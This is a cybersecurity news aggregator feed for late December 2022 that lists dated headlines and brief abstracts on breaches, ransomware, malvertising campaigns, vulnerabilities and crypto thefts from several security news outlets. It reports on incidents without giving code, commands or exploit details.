December 2022
December 31, 2022 – Breach
Personal health information of 42M Americans leaked between 2016 and 2021
Abstract
Crooks have had access to the medical records of 42 million Americans since 2016 as the number of hacks on healthcare organizations doubled. Medical records of 42 million Americans have been sold on the dark web since 2016; this information comes... (Security Affairs)
December 31, 2022 – Phishing
Malvertising campaign MasquerAds abuses Google Ads
Abstract
Experts warn of a new malvertising campaign abusing Google Ads that targets users searching for popular software. Guardio Labs researchers uncovered a malvertising campaign, tracked as MasquerAds and attributed to a threat actor known as Vermux, that... (Security Affairs)
December 30, 2022 – Criminals
Multiple Malware For Sale on Darkweb Forums
Abstract
Researchers have spotted a new threat group, dubbed PureCoder, selling multiple malware strains, including miners, information stealers, and crypters, on the dark web. Recently, Italian cyber security agency TG Soft identified that the PureLogs information stealer was used by Alibaba2044 threat actors ... (Cyware)
December 30, 2022 – Malware
New Linux malware targets WordPress sites by exploiting 30 bugs
Abstract
A new Linux malware has been exploiting 30 vulnerabilities in outdated WordPress plugins and themes to deploy malicious JavaScript. Doctor Web researchers discovered a Linux malware, tracked as Linux.BackDoor.WordPressExploit.1, that compromises... (Security Affairs)
December 30, 2022 – Attack
Royal Ransomware Group Claims Attack on Iowa PBS Station
Abstract
Two days after Iowa PBS became aware of the incident, several local news outlets reported that it had cut short its annual fall fundraising pledge drive due to a cyberattack. The Royal ransomware group took credit for the attack. (Cyware)
December 30, 2022 – Vulnerabilities
NETGEAR fixes a severe bug in its routers. Patch it asap!
Abstract
Netgear addressed a high-severity bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6), and Wireless AC. Netgear fixed a bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless... (Security Affairs)
December 30, 2022 – Cryptocurrency
Hackers Drain Cryptocurrency Worth Millions From Crypto-Wallets
Abstract
Security issues surrounding crypto wallets and the entire blockchain ecosystem have become prevalent. Several crypto platforms including BTC[.]com, 3Commas, and Bitkeep have been added to the long list of crypto-related hacks. Users are recommended to practice caution, refrain from clicking on ... (Cyware)
December 30, 2022 – Attack
Lockbit ransomware gang claims to have hacked the Port of Lisbon
Abstract
The website for the Port of Lisbon is still down days after it was the target of a ransomware attack claimed by the Lockbit group. The Port of Lisbon is the third-largest port in Portugal and one of the main European ports due to its strategic location. The... (Security Affairs)
December 30, 2022 – Malware
Google Ads Abused to Spread Malware
Abstract
Different malware operators are increasingly abusing the Google Ads platform to drop malware, including variants of Raccoon Stealer and the IcedID botnet. Threat actors clone the official websites of popular software to lure users into downloading their malicious versions. (Cyware)
December 30, 2022 – Government
CISA adds JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog
Abstract
US CISA added TIBCO Software's JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog. US CISA added TIBCO Software's JasperReports vulnerabilities, tracked as CVE-2018-5430 (CVSS score: 7.7) and CVE-2018-18809 (CVSS... (Security Affairs)
December 30, 2022 – Attack
Toy Maker Jakks Pacific Reports Cyberattack
Abstract
The firm – which is one of the biggest toy companies in the world thanks to licensing deals with Disney and Nintendo – hired cybersecurity experts to deal with the incident and restore its servers. (Cyware)
December 30, 2022 – Outage
Port of Lisbon Website Still Down as LockBit Gang Claims Cyberattack
Abstract
The Administration of the Port of Lisbon (APL) is working permanently and closely with all the competent authorities in order to guarantee the security of the systems and respective data. (Cyware)
December 30, 2022 – Vulnerabilities
CISA adds JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog
Abstract
CVE-2018-5430 resides in TIBCO JasperReports Server and may allow someone read-only access to the contents of the web application. CVE-2018-18809 in the TIBCO JasperReports Library is a directory-traversal vulnerability. (Cyware)
December 29, 2022 – General
Large-Volume DDoS Attacks Increase by 81% in 2022
Abstract
Imperva’s report on the DDoS threat landscape mentions that the largest DDoS attack in 2022 was 4.5x larger than the biggest attack observed in 2021. The number of large-volume DDoS attacks per month also saw an 81% jump from the previous year. The rise in geopolitical conflict also led to an increase in hacktiv ... (Cyware)
December 29, 2022 – Vulnerabilities
Thousands of Citrix servers still vulnerable to CVE-2022-27510 and CVE-2022-27518
Abstract
Researchers warn that thousands of Citrix Application Delivery Controller (ADC) and Gateway endpoints are still unpatched. NCC Group's Fox-IT research team warns that thousands of Citrix ADC and Gateway endpoints remain vulnerable to two critical vulnerabilities,... (Security Affairs)
December 29, 2022 – Attack
EarSpy Attack Eavesdrops Using Motion Sensors
Abstract
Academic researchers from five American universities discovered a new attack method called EarSpy that can be used to eavesdrop on Android phones via motion sensors. According to the experts, one way to reduce the efficacy of the EarSpy attack is to set the volume of the ear speaker lower. (Cyware)
December 29, 2022 – Attack
LCMHS Louisiana hospital suffered a ransomware attack that impacted 270,000 patients
Abstract
The Lake Charles Memorial Health System (LCMHS) suffered a ransomware attack that impacted 270,000 patients. The Lake Charles Memorial Health System (LCMHS) disclosed a data breach that affected almost 270,000 patients at its medical centers. The Lake... (Security Affairs)
December 29, 2022 – Government
Govt of India Issues Advisory Against Potential Phishing Attacks
Abstract
The Computer Emergency Response Team (CERT-In) issued an advisory in the wake of this data breach. It warned Indian users that their accounts could be compromised by the phishing attacks that cybercriminals undertake. (Cyware)
December 29, 2022 – Attack
Lake Charles Memorial Hospital Suffered a Ransomware Attack
Abstract
The Hive group laid bare the files that were allegedly stolen after breaking into LCMHS systems. Bills of materials, cards, contracts, medical information, papers, medical records, scans, residents, and other documents are among the files listed. (Cyware)
December 29, 2022 – Government
Lawmakers Signal Inquiries Into U.S. Government’s Use of Foreign Spyware
Abstract
Countries globally have embraced commercial spyware for the new powers of surveillance it gives them. The Israeli firm NSO held a near monopoly in the industry for nearly a decade, selling Pegasus to Mexico, Saudi Arabia, India, and other nations. (Cyware)
December 29, 2022 – Malware
Lazarus’s Subgroup BlueNoroff Adopts New Malware Delivery Method
Abstract
The financially motivated BlueNoroff group was found using a new malware strain to target financial institutions in Japan. The gang has also devised a new tactic to evade Mark-of-the-Web (MotW) security measures. Kaspersky researchers discovered more than 70 domains used by BlueNoroff. These ... (Cyware)
December 29, 2022 – Vulnerabilities
WordPress Vulnerability & Patch Roundup December 2022
Abstract
To help educate website owners on emerging threats to their environments, researchers at Sucuri compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. (Cyware)
December 29, 2022 – Malware
GuLoader Uses New Anti-Analysis Techniques to Evade Security Software
Abstract
GuLoader has been updated with new anti-analysis techniques to dodge traditional security solutions. The new version is also hostile to systems running virtual machines. The malware scans the entire process memory for any virtual machine-related strings to thwart researchers and hostile virtualized env ... (Cyware)
December 28, 2022 – Hacker
Hackers abuse Google Ads to spread malware in legit software
Abstract
Malware operators have been increasingly abusing the Google Ads platform to spread malware to unsuspecting users searching for popular software products. (BleepingComputer)
December 28, 2022 – Government
UAE Panel on Cybersecurity Warns Against Cyberattacks During New Year Celebrations
Abstract
The council then pointed out that many countries have witnessed rapid digital transformation in services and daily transactions, which has increased the risks posed by cyberattacks against various sectors, including electricity, gas, and water. (Cyware)
December 28, 2022 – Breach
Crypto wallet BitKeep lost over $9M in a cyber attack
Abstract
Decentralized multi-chain crypto wallet BitKeep lost over $9 million worth of digital currencies after a cyber attack. BitKeep was the victim of a supply chain attack that resulted in the theft of over $9 million worth of digital currencies from its customers.... (Security Affairs)
December 28, 2022 – Attack
Royal ransomware claims attack on Intrado telecom provider
Abstract
The Royal ransomware gang claimed responsibility for a cyber attack against telecommunications company Intrado on Tuesday. (BleepingComputer)
December 28, 2022 – Denial Of Service
81% Increase in Large-Volume DDoS Attacks
Abstract
DDoS attacks, although frequent, are generally low volume, with the average DDoS attack reaching only 240,000 RPS. Large-volume attacks make up less than 1% of total DDoS attacks. (Cyware)
December 28, 2022 – General
Zurich chief warned that cyber attacks will become uninsurable
Abstract
The chief executive of insurance giant Zurich warns that cyber attacks, rather than natural catastrophes, will become uninsurable. Mario Greco, chief executive of insurance giant Zurich, has warned that cyber attacks will soon become “uninsurable.” The... (Security Affairs)
December 28, 2022 – Vulnerabilities
Thousands of Citrix servers vulnerable to patched critical flaws
Abstract
Thousands of Citrix ADC and Gateway deployments remain vulnerable to two critical-severity security issues that the vendor fixed in recent months. (BleepingComputer)
December 28, 2022 – Criminals
30 Million Railway Customers’ Data for Sale On the Dark Web
Abstract
Username, email, verified and verified mobile numbers, gender, city ID, city name, state ID, and language preferences are among the data. Sample data posted by the actor includes a number of records containing emails and phone numbers. (Cyware)
December 28, 2022 – Attack
Ransomware attack at Louisiana hospital impacts 270,000 patients
Abstract
The Lake Charles Memorial Health System (LCMHS) is sending out notices of a data breach affecting almost 270,000 people who have received care at one of its medical centers. (BleepingComputer)
December 28, 2022 – Attack
Defrost Finance Breaks Silence on ‘Exit Scam’ Accusations, Denies Rug Pull
Abstract
On Dec. 23, the platform announced it suffered a flash loan attack, leading to the draining of user funds from its v2 protocol. One day later, another incident saw a hacker steal the admin key for a second “much larger” attack on the v1 protocol. (Cyware)
December 28, 2022 – Cryptocurrency
Cryptocurrency Exchange BTC.com Suffers Massive Cyber Attack
Abstract
During the attack, BTC.com lost about $700,000 worth of crypto owned by its clients and $2.3 million in digital assets owned by the company. The company has recovered some of the stolen cryptocurrency but has not disclosed the amount. (Cyware)
December 28, 2022 – Criminals
Hackers Steal Power Utility Customer Data
Abstract
A law firm handling breach notification for Sargent & Lundy estimates the hackers stole the personal data of more than 6,900 individuals. The Black Basta ransomware gang surfaced in April 2022. The group is known for using double-extortion tactics. (Cyware)
December 28, 2022 – Breach
Cybersecurity Firm Links Piers Morgan Twitter Hack to Leak of 400m Records
Abstract
The hacker claimed the data had been “scraped” from Twitter via a “vulnerability” in the site, and “includes emails and phone numbers of celebrities, politicians, companies, normal users, and a lot of OG and special usernames.” (Cyware)
December 28, 2022 – General
Reported phishing attacks have quintupled
Abstract
The rise in Q3 2022 was attributable, in part, to increasing numbers of attacks reported against several specific targeted brands. These target companies and their customers suffered from large numbers of attacks from persistent phishers. (Cyware)
December 28, 2022 – Hacker
Hackers Target WordPress Gift Card Plugin to Upload Backdoors
Abstract
A critical vulnerability affects the WordPress plugin YITH WooCommerce Gift Cards, which has over 50,000 installations worldwide. The bug, tracked as CVE-2022-45359, is being actively abused by threat actors. An unauthenticated hacker can upload files to vulnerable sites, completely taking over a compro ... (Cyware)
December 27, 2022 – Cryptocurrency
BTC.com lost $3 million worth of cryptocurrency in cyberattack
Abstract
BTC.com, one of the world's largest cryptocurrency mining pools, announced it was the victim of a cyberattack that resulted in the theft of approximately $3 million worth of crypto assets belonging to both customers and the company. (BleepingComputer)
December 27, 2022 – APT
Lazarus APT Uses Phishing Domains to Target NFT Investors
Abstract
Lazarus Group is believed to be behind a massive phishing campaign targeting NFT investors via nearly 500 phishing domains. They use fake bait websites to offer malicious mints. The attack begins by sending out spam emails laden with links to legitimate-looking phishing pages. (Cyware)
December 27, 2022 – Criminals
Hackers stole $3 million worth of cryptocurrency from BTC.com
Abstract
The BTC.com cryptocurrency platform was the victim of a cyberattack that resulted in the theft of $3 million worth of crypto assets. BTC.com is a website that provides services for managing and transferring Bitcoin; it offers a digital wallet for storing... (Security Affairs)
December 27, 2022 – Criminals
Hackers steal $8 million from users running trojanized BitKeep apps
Abstract
Multiple BitKeep crypto wallet users reported that their wallets were emptied during Christmas after hackers triggered transactions that didn't require verification. (BleepingComputer)
December 27, 2022 – Malware
Malware Disguised as YouTube Bot Steals Sensitive Data
Abstract
Threat actors are distributing a new YouTube bot malware that can artificially boost the rankings of videos on YouTube and steal sensitive information from browsers. Upon execution, the malware performs an anti-VM check to prevent malware detection and analysis by researchers in a virtual envi ... (Cyware)
December 27, 2022 – Policy and Law
Facebook (Meta) to settle Cambridge Analytica data leak for $725M
Abstract
Facebook (Meta) has agreed to pay $725 million to settle the class-action lawsuit filed in 2018 over the Cambridge Analytica data leak. Facebook (Meta) has agreed to pay $725 million to settle a class-action lawsuit filed in 2018 over the Cambridge... (Security Affairs)
December 27, 2022 – Attack
EarSpy attack eavesdrops on Android phones via motion sensors
Abstract
A team of researchers has developed an eavesdropping attack for Android devices that can, to various degrees, recognize the caller's gender and identity, and even discern private speech. (BleepingComputer)
December 27, 2022 – Vulnerabilities
Backdoor Credential Found in ZyXEL Router
Abstract
Cybersecurity researcher RE-Solver claimed to have found hardcoded credentials (CVE-2022-40602) in ZyXEL LTE3301-M209 LTE indoor routers. The bug he exploited is a Telnet backdoor in the D-Link DWR-921 that is also present in the ZyXEL LTE3301-M209. (Cyware)
December 27, 2022 – Hacker
BlueNoroff Introduces New Methods Bypassing MoTW
Abstract
The BlueNoroff group introduced new file types to evade Mark-of-the-Web (MOTW) security measures. It expanded the file types it uses, tweaked its infection methods, and created numerous fake domains impersonating venture capital companies and banks. (Cyware)
December 27, 2022 – Malware
Uncovering the link between PrivateLoader PPI service and RisePro stealer
Abstract
The pay-per-install (PPI) malware downloader service PrivateLoader is being used to distribute the RisePro info-stealing malware. The pay-per-install (PPI) malware downloader service PrivateLoader is being used to distribute the information-stealing... (Security Affairs)
December 27, 2022 – Criminals
North Korean Hackers Steal NFTs via Phishing Websites
Abstract
The attackers set up nearly 500 decoy sites, including that of a project associated with the World Cup, and the NFT marketplaces OpenSea, X2Y2 and Rarible. They made off with $365,000 by stealing 1,055 NFTs with just one of those phishing addresses. (Cyware)
December 27, 2022 – Phishing
Crooks impersonate brands using search engine advertisement services
Abstract
The FBI warns of cybercriminals using search engine advertisement services to impersonate brands and defraud users. The FBI is warning of cyber criminals using search engine advertisement services to impersonate brands and direct users to websites... (Security Affairs)
December 27, 2022 – General
Modern technology and cyber recovery will intersect in the next generation of attacks
Abstract
While embarking on a virtual life journey is appealing to many, it has vulnerabilities. As the metaverse continues to gain momentum, phishing attempts, NFT-related scams and malware attacks have already begun. (Cyware)
December 27, 2022 – Vulnerabilities
XLL Files Increasingly Getting Abused by Attackers
Abstract
In the wake of Microsoft's effort to phase out support for VBA macros in Office docs, cybercriminals have now turned to using XLL files to embed malicious code in docs. FIN7, an infamous cybercrime threat actor, started using XLL files as attachments in email campaigns early this year. Additiona ... (Cyware)
December 26, 2022 – Malware
GuLoader implements new evasion techniques
Abstract
Cybersecurity researchers exposed new evasion techniques adopted by an advanced malware downloader called GuLoader. CrowdStrike researchers detailed multiple evasion techniques implemented by an advanced malware downloader called GuLoader (aka... (Security Affairs)
December 26, 2022 – Criminals
Hacker claims to be selling Twitter data of 400 million users
Abstract
A threat actor claims to be selling public and private data of 400 million Twitter users scraped in 2021 using a now-fixed API vulnerability. They're asking $200,000 for an exclusive sale. (BleepingComputer)
December 26, 2022 – Criminals
Hackers Drain $8M in Assets from Bitkeep Wallets in Latest DeFi Exploit
Abstract
One suspected hacker wallet address already holds more than $5 million in digital assets. The amount exploited is still not final, and the attackers are still transferring funds to multiple wallet addresses. (Cyware)
December 26, 2022 – Breach
Cincinnati State Data Breach Possibly Exposed Social Security Numbers, Other Information
Abstract
The data included full names, addresses, dates of birth, Social Security numbers, driver’s license or state identification numbers, health insurance information, and financial account information, the notice states. (Cyware)
December 26, 2022 – Breach
Attackers Bypass 2FA, Take Over Xfinity and Other Accounts
Abstract
A number of Comcast Xfinity customers reported their accounts being hacked despite two-factor authentication being enabled on their accounts. According to a researcher, hackers attempted credential-stuffing attacks on users’ accounts. Criminals also tried to break into victims’ Dropbox, Evernote, a ... (Cyware)
December 26, 2022 – Hacker
IcedID Operators Abuse Google Ads in Malvertising Campaign
Abstract
Trend Micro noted a new distribution trend for the IcedID botnet via Google pay-per-click (PPC) ads, aka malvertising. The adversaries behind the IcedID malware erected fake websites of legitimate organizations and well-known applications to lure online users. Attackers also drop a new loader via an MS ... (Cyware)
December 26, 2022 – Attack
Labour Attacks Delays to Online Safety Bill as it Highlights Christmas Scams
Abstract
The bill has been hit by repeated delays and amendments. It has since been held up while ministers re-wrote parts of it, given a row among Conservative MPs that it would unfairly stifle freedom of speech online. (Cyware)
December 26, 2022 – Vulnerabilities
Critical Linux Kernel Flaw Affects SMB Servers with KSMBD Enabled
Abstract
The issue results from the lack of validation of the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the kernel. (Cyware)
December 26, 2022 – Breach
Hacker Claims to Have Scraped 400 Million Twitter User Records
Abstract
The posting, apparently first noticed by Israeli cyber intelligence firm Hudson Rock, includes alleged private email addresses for three dozen well-known personalities including New York Democratic Rep. (Cyware)
December 25, 2022 – Criminals
Vice Society Adds Custom-branded Payload PolyVice to its Arsenal
Abstract
The Vice Society ransomware group spun up another custom ransomware variant, dubbed PolyVice. The strain deploys a robust encryption scheme that uses the NTRUEncrypt and ChaCha20-Poly1305 algorithms. The authors of this new ransomware variant are also likely selling similar payloads to other hacking group ... (Cyware)
December 25, 2022 – Vulnerabilities
Critical Linux Kernel flaw affects SMB servers with ksmbd enabled
Abstract
Experts warn of a critical Linux kernel vulnerability (CVSS score of 10) impacting SMB servers that can lead to remote code execution. A critical Linux kernel vulnerability (CVSS score of 10) exposes SMB servers with ksmbd enabled to hack. KSMBD is a Linux... (Security Affairs)
December 25, 2022 – Vulnerabilities
Experts warn of attacks exploiting WordPress gift card plugin
Abstract
Threat actors are actively exploiting a critical flaw in the YITH WooCommerce Gift Cards Premium WordPress plugin, installed on over 50,000 websites. Hackers are actively exploiting a critical vulnerability, tracked as CVE-2022-45359 (CVSS v3: 9.8),... (Security Affairs)
December 25, 2022 – Breach
Data of 400 Million Twitter users up for sale
Abstract
A threat actor is claiming they have obtained data of 400,000,000 Twitter users and is offering it for sale. A threat actor claims they have obtained data of 400,000,000 Twitter users and is attempting to sell it. The seller claims the database... (Security Affairs)
December 25, 2022 – General
Security Affairs newsletter Round 399 by Pierluigi Paganini
Abstract
A new round of the weekly SecurityAffairs newsletter has arrived! Every week the best security articles from Security Affairs, free for you in your email box. If you also want to receive the newsletter with the international press for free, subscribe here. Expert... (Security Affairs)
December 25, 2022 – Policy and Law
Microsoft fined €60 million in France for using advertising cookies without consent
Abstract
France's privacy watchdog fined Microsoft €60 million for using advertising cookies without explicit customer consent. France's privacy watchdog fined Microsoft's Ireland subsidiary €60 million for using advertising cookies without the explicit... (Security Affairs)
December 24, 2022 – Malware
New info-stealer malware infects software pirates via fake cracks sites
Abstract
A new information-stealing malware named 'RisePro' is being distributed through fake cracks sites operated by the PrivateLoader pay-per-install (PPI) malware distribution service. (BleepingComputer)
December 24, 2022 – Vulnerabilities
Container Verification Bug Allows Malicious Images to Cloud Up Kubernetes
Abstract
A high-severity security vulnerability in the Kyverno admission controller for container images could allow malicious actors to import a raft of nefarious code into cloud production environments. (Cyware)
December 24, 2022 – Vulnerabilities
Expert found backdoor credentials in ZyXEL LTE3301-M209
Abstract
The cybersecurity researcher RE-Solver discovered backdoor credentials in ZyXEL LTE3301-M209 LTE indoor routers. Security researcher ReSolver announced the discovery of hardcoded credentials (CVE-2022-40602) in ZyXEL LTE3301-M209 LTE indoor routers. In... (Security Affairs)
December 24, 2022 – Malware
Raspberry Robin malware used in attacks against Telecom and Governments
Abstract
The Raspberry Robin worm attacks are aimed at telecommunications and government office systems across Latin America, Australia, and Europe. Researchers from Trend Micro have uncovered a Raspberry Robin worm campaign targeting telecommunications and government... (Security Affairs)
December 23, 2022 – Ransomware
The Week in Ransomware - December 23rd 2022 - Targeting Microsoft Exchange
Abstract
Reports this week illustrate how threat actors consider Microsoft Exchange a prime target for gaining initial access to corporate networks to steal data and deploy ransomware. (BleepingComputer)
December 23, 2022 – Attack
New STEPPY#KAVACH Attack Campaign Likely Targeting Indian Government
Abstract
The new malicious campaign from STEPPY#KAVACH observed over the past few weeks appears to share many common TTPs with the SideCopy/APT36 threat actors that were extremely active in 2021 and were previously attributed to Pakistan by some researchers. (Cyware)
December 23, 2022 – Privacy
TikTok parent company ByteDance revealed the use of TikTok data to track journalists Full Text
Abstract
ByteDance admitted that its employees accessed TikTok data to track journalists to identify the source of leaks to the media. TikTok parent company ByteDance revealed that several employees accessed the TikTok data of two journalists to investigate...Security Affairs
December 23, 2022 – Vulnerabilities
Hackers exploit bug in WordPress gift card plugin with 50K installs Full Text
Abstract
Hackers are actively targeting a critical flaw in YITH WooCommerce Gift Cards Premium, a WordPress plugin used on over 50,000 websites.BleepingComputer
December 23, 2022 – Botnet
IcedID Botnet Distributors Abuse Google PPC to Distribute Malware Full Text
Abstract
Trend Micro researchers say that malicious actors are using malvertising to distribute the IcedID malware via cloned webpages of legitimate organizations and well-known applications.Cyware
December 23, 2022 – Breach
BetMGM discloses security breach impacting 1.5 Million customers Full Text
Abstract
Online sports betting company BetMGM suffered a data breach and threat actors offered for sale a database containing the data of 1.5 million customers. On December 21, the online sports betting company BetMGM disclosed a data breach while threat actors...Security Affairs
December 23, 2022 – Breach
Massive Twitter data leak investigated by EU privacy watchdog Full Text
Abstract
The Irish Data Protection Commission (DPC) has launched an inquiry following last month's news reports of a massive Twitter data leak.BleepingComputer
December 23, 2022 – Vulnerabilities
Zoom Whiteboard patches XSS bug Full Text
Abstract
Zoom has patched a cross-site scripting (XSS) bug that worked in both the desktop and web versions of its Whiteboard app. The XSS bug in Zoom Whiteboard was discovered by security researcher Eugene Lim (aka ‘spaceraccoon’).Cyware
December 23, 2022 – Attack
An Iranian group hacked Israeli CCTV cameras, defense was aware but didn’t block it Full Text
Abstract
An Iranian group hacked dozens of CCTV cameras in Israel in 2021 and maintained access for a long period of time. An Iranian group of hackers, known as Moses Staff, had seized control of dozens of Israeli CCTV cameras, the hack was known to the authorities...Security Affairs
December 23, 2022 – Vulnerabilities
Ghost CMS vulnerable to critical authentication bypass flaw Full Text
Abstract
A critical vulnerability in the Ghost CMS newsletter subscription system could allow external users to create newsletters or modify existing ones so that they contain malicious JavaScript.BleepingComputer
December 23, 2022 – General
Dealing with cloud security shortfalls Full Text
Abstract
72% of IT leaders believe their companies moved to the cloud without properly understanding the skills, maturity curve, and complexities of making it all work securely, according to a recent CloudBolt Software report.Cyware
December 23, 2022 – Breach
LastPass revealed that encrypted password vaults were stolen Full Text
Abstract
The data breach suffered by LastPass in August 2022 may have been more severe than previously thought. In August password management software firm LastPass disclosed a security breach, threat actors had access to portions of the company development...Security Affairs
December 23, 2022 – General
Why Security Teams Shouldn’t Snooze on MFA Fatigue Full Text
Abstract
While security teams may be hasty to pile on every additional security measure in existence to supplement MFA, they must not compromise too heavily on convenience. It's a delicate balance and a difficult one to strike.Cyware
December 23, 2022 – Breach
Morley Companies data breach $4.3M class action settlement Full Text
Abstract
The settlement class, which has been directly notified of the settlement, is defined as U.S. residents whose data was compromised during the data incident the defendant announced on or about August 1, 2021.Cyware
December 23, 2022 – Breach
Fertility Centers of Illinois data breach $450K class action settlement Full Text
Abstract
Consumers affected by a data breach in February 2021 filed a class action lawsuit against FCI, arguing that the company should have protected their information through reasonable cybersecurity measures.Cyware
December 23, 2022 – Criminals
Vice Society Group May Have Outsourced the Development of ‘PolyVice’ Ransomware Full Text
Abstract
Researchers say it's likely that the group behind the custom-branded PolyVice ransomware for Vice Society is also selling similar payloads to other groups. It implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms.Cyware
December 22, 2022 – Breach
Leading sports betting firm BetMGM discloses data breach Full Text
Abstract
Leading sports betting company BetMGM disclosed a data breach after a threat actor stole personal information belonging to an undisclosed number of customers.BleepingComputer
December 22, 2022 – Malware
Beyond ProxyNotShell - New OWASSRF Exploit Targets MS Exchange Full Text
Abstract
Security analysts at CrowdStrike reported a new exploit method called OWASSRF that requires a hacker to abuse ProxyNotShell flaws (CVE-2022-41080 and CVE-2022-41082) in Microsoft Exchange servers. Through this, an attacker can pull off RCE attacks via Outlook Web Access (OWA). A deeper study into i...Cyware
December 22, 2022 – Criminals
Vice Society ransomware gang is using a custom locker Full Text
Abstract
The Vice Society ransomware group has adopted new custom ransomware, with a strong encryption scheme, in recent intrusions. SentinelOne researchers discovered that the Vice Society ransomware gang has started using a custom ransomware that implements...Security Affairs
December 22, 2022 – Breach
Lastpass: Hackers stole customer vault data in cloud storage breach Full Text
Abstract
LastPass revealed today that attackers stole customer vault data after breaching its cloud storage earlier this year using information stolen during an August 2022 incident.BleepingComputer
December 22, 2022 – General
Over 50 New CVE Numbering Authorities Announced in 2022 Full Text
Abstract
Most CNAs can assign CVE identifiers to vulnerabilities found in their own products, but some can also assign CVEs to flaws found by their researchers in third-party software that is not in another CNA’s scope.Cyware
December 22, 2022 – Botnet
A new Zerobot variant spreads by exploiting Apache flaws Full Text
Abstract
Microsoft spotted an upgraded variant of the Zerobot botnet that spreads by exploiting Apache vulnerabilities. Microsoft Threat Intelligence Center (MSTIC) researchers discovered a new variant of the Zerobot botnet (aka ZeroStresser) that was improved...Security Affairs
December 22, 2022 – General
DuckDuckGo now blocks Google sign-in pop-ups on all sites Full Text
Abstract
DuckDuckGo apps and extensions are now blocking Google Sign-in pop-ups on all its apps and browser extensions, removing what it perceives as an annoyance and a privacy risk for its users.BleepingComputer
December 22, 2022 – Attack
Stolen certificates in two waves of ransomware and wiper attacks Full Text
Abstract
The threat actors used certificates from Nvidia and Kuwait Telecommunications Company to sign their malware; the former was already leaked, but we’re not sure how they got their hands on the latter.Cyware
December 22, 2022 – Criminals
North Korea-linked hackers stole $626 million in virtual assets in 2022 Full Text
Abstract
North Korea-linked threat actors have stolen an estimated $1.2 billion worth of cryptocurrency and other virtual assets in the past five years. South Korea’s spy agency, the National Intelligence Service, estimated that North Korea-linked threat...Security Affairs
December 22, 2022 – Attack
Comcast Xfinity accounts hacked in widespread 2FA bypass attacks Full Text
Abstract
Comcast Xfinity customers report their accounts being hacked in widespread attacks that bypass two-factor authentication. These compromised accounts are then used to reset passwords for other services, such as the Coinbase and Gemini crypto exchanges.BleepingComputer
December 22, 2022 – Breach
Shoemaker Ecco Leaks Over 60GB of Sensitive Data for 500+ Days Full Text
Abstract
Not only could anyone have modified the data, but the server misconfiguration’s severity likely left the company open to an attack that could have affected customers all over the world.Cyware
December 22, 2022 – Ransomware
Vice Society ransomware gang switches to new custom encryptor Full Text
Abstract
The Vice Society ransomware operation has switched to using a custom ransomware encryptor that implements a strong, hybrid encryption scheme based on NTRUEncrypt and ChaCha20-Poly1305.BleepingComputer
December 22, 2022 – General
North Korea-linked hackers stole $626 million in virtual assets in 2022 Full Text
Abstract
South Korea’s spy agency, the National Intelligence Service, estimated that North Korea-linked threat actors have stolen an estimated 1.5 trillion won ($1.2 billion) in cryptocurrency and other virtual assets in the past five years.Cyware
December 22, 2022 – Solution
Brave launches FrodoPIR, a privacy-focused database query system Full Text
Abstract
Brave Software developers have created a new privacy-centric database query system called FrodoPIR that retrieves data from servers without disclosing the content of user queries.BleepingComputer
December 22, 2022 – Government
France Seeks to Protect Hospitals After Series of Cyberattacks Full Text
Abstract
"The target is that 100 percent of the most important health facilities have undergone these new exercises by May 2023," the interior, health, and digital services ministers announced in a joint statement.Cyware
December 22, 2022 – Hacker
FIN7 hackers create auto-attack platform to breach Exchange servers Full Text
Abstract
The notorious FIN7 hacking group uses an auto-attack system that exploits Microsoft Exchange and SQL injection vulnerabilities to breach corporate networks, steal data, and select targets for ransomware attacks based on financial size.BleepingComputer
December 22, 2022 – Breach
Sports betting operator BetMGM hit by data breach Full Text
Abstract
The issue affected customer information such as name, contact information, date of birth, hashed Social Security number, account identifiers and information related to transactions with BetMGM, the company said.Cyware
December 22, 2022 – Vulnerabilities
Microsoft gives final warning about Basic Auth deprecation in Exchange Online Full Text
Abstract
Organizations will still be informed seven days before the protocol is disabled for them. Once it is turned off, affected apps will throw an HTTP error 401 for bad username/password. The only way for them to work will be to switch to Modern Auth.Cyware
December 22, 2022 – Hacker
XLLing in Excel - threat actors using malicious add-ins Full Text
Abstract
Cisco Talos highlights a new vector for delivering malicious code to Microsoft Excel—malicious add-ins, specifically XLL files. Although XLL files have been supported since early versions of Excel, malicious actors started using them relatively recently.Cyware
December 21, 2022 – Vulnerabilities
Corsair keyboard bug makes it type on its own, no malware involved Full Text
Abstract
Corsair has confirmed that a bug in the firmware of K100 keyboards, and not malware, is behind previously entered text being auto-typed into applications days later.BleepingComputer
December 21, 2022 – Malware
Info-stealers Used to Target Ukraine’s Military Systems Full Text
Abstract
Ukraine’s DELTA military system users were the target of a phishing attack that distributed infostealers identified as FateGrab and StealDeal. Email and instant messages with fake warnings to update the Delta certificates were used to lure victims. Upon execution, StealDeal and FateGrab malware wo...Cyware
December 21, 2022 – Ransomware
Play ransomware attacks use a new exploit to bypass ProxyNotShell mitigations on Exchange servers Full Text
Abstract
Play ransomware attacks target Exchange servers with a new exploit that bypasses Microsoft’s ProxyNotShell mitigations. Play ransomware operators target Exchange servers using a new exploit chain, dubbed OWASSRF by Crowdstrike, that bypasses Microsoft’s...Security Affairs
December 21, 2022 – Malware
Zerobot malware now spreads by exploiting Apache vulnerabilities Full Text
Abstract
The Zerobot botnet has been upgraded to infect new devices by exploiting security vulnerabilities affecting Internet-exposed and unpatched Apache servers.BleepingComputer
December 21, 2022 – Vulnerabilities
Critical Vulnerabilities Found in Passwordstate Enterprise Password Manager Full Text
Abstract
Researchers discovered that the Passwordstate enterprise password manager made by Australian company Click Studios is affected by serious vulnerabilities that could allow an unauthenticated attacker to obtain a user’s passwords.Cyware
December 21, 2022 – Breach
Okta revealed that its private GitHub repositories were hacked this month Full Text
Abstract
American identity and access management giant Okta revealed that its private GitHub repositories were hacked this month. Okta revealed that its private GitHub repositories were hacked this month; the news was first reported by BleepingComputer...Security Affairs
December 21, 2022 – Attack
Russians hacked JFK airport’s taxi dispatch system for profit Full Text
Abstract
Two U.S. citizens were arrested for allegedly conspiring with Russian hackers to hack the John F. Kennedy International Airport (JFK) taxi dispatch system to move specific taxis to the front of the queue in exchange for a $10 fee.BleepingComputer
December 21, 2022 – Phishing
